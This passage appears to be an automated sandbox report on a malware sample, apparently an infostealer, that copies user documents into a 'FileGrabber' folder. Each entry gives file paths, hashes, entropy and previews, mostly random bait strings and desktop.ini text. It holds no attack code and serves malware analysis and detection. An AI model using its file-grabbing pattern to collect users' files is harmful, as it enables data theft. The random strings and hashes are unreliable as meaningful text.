ADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\My Music\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5258560106596737
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
MD5:	06E8F7E6DDD666DBD323F7D9210F91AE
SHA1:	883AE527EE83ED9346CD82C33DFC0EB97298DC14
SHA-256:	8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
SHA-512:	F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\My Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\My Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\My Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\My Videos\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5218877566914193
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
MD5:	50A956778107A4272AAE83C86ECE77CB
SHA1:	10BCE7EA45077C0BAAB055E0602EEF787DBA735E
SHA-256:	B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
SHA-512:	D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\ONBQCLYSPU\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\ONBQCLYSPU\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\ONBQCLYSPU\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\ONBQCLYSPU\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
